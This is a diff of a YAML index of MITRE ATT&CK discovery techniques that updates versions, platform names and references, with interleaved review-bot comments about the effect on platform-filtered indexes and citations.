x_mitre_detection: ''
x_mitre_domains:
@@ -50618,7 +51308,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -50632,6 +51322,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50651,56 +51345,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
@@ -50722,19 +51371,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
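Review bot: the platform list for T1087.004 loses 'Azure AD', 'Office 365' and 'Google Workspace' and gains 'Office Suite' and 'Identity Provider'. Anything that builds per-platform views by matching on the old strings will silently drop this technique, so the index generator and any platform-filtered index files need to map the new names before this is merged; it also makes the earlier hunk's deletion of the old platforms (`- Azure AD`, `- Office 365`, `- Google Workspace`) a behavioural change rather than a reorder. Two smaller points in the same hunk: `x_mitre_permissions_required: [User]` is dropped, which matches the deprecation of that field upstream but should be mentioned in the changelog; and the `source_name: Google Cloud - IAM Servie Accounts List API` typo is the upstream citation key, so leave it as is unless the matching `(Citation: ...)` text is updated at the same time.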
@@ -50805,46 +51496,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -50868,6 +51524,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -50878,9 +51537,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -50890,12 +51554,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -50938,12 +51629,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests: []
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -50954,28 +51644,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -51008,9 +51701,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests: []
T1614.001:
@@ -51053,7 +51745,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -51092,13 +51784,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests: []
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -51139,87 +51829,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests: []
T1518.001:
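Review bot: apart from the key reorder, two content changes in the T1614 hunk deserve a mention in the PR description. The FBI Ragnar Locker reference moves from `assets.documentcloud.org` to `s3.documentcloud.org` with a new retrieved date, so the old link is presumably dead and the new host should be checked once before merge. `x_mitre_permissions_required: [User]` is removed and `x_mitre_version` goes '1.0' to '1.1', while the sub-technique T1614.001 in the hunk above still carries `x_mitre_permissions_required`; keep the two consistent or note why they differ. The hard line break after `GetLocaleInfoW` inside the `|2-` description and detection scalars is carried over from the removed lines, so it is pre-existing, but it does leave a literal newline mid-sentence in the rendered text.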
@@ -51272,17 +51960,16 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests: []
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
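Review bot: the T1526 description now reads "Microsoft Graph API" but the same sentence still cites `(Citation: Azure AD Graph API)`. Check that an `external_references` entry with `source_name: Azure AD Graph API` is still present for T1526 after this change, otherwise the citation key dangles; if upstream renamed the reference, the citation token in the description should follow.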
@@ -51290,10 +51977,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -51302,15 +51991,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
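Review bot: the platform list for T1526 drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider` (same pattern for T1538 further down). Any generated index or filter that is keyed on the old platform names will stop matching these techniques, so the index-generation step and per-platform outputs need to be regenerated or remapped in the same change; the version bump to `'1.4'` alone does not cover that.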
@@ -51338,9 +52028,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
@@ -51415,7 +52102,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests: []
T1046:
@@ -51487,7 +52173,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests: []
T1518:
@@ -51536,12 +52221,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests: []
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51562,12 +52246,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -51592,7 +52275,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
@@ -51647,7 +52329,7 @@ discovery:
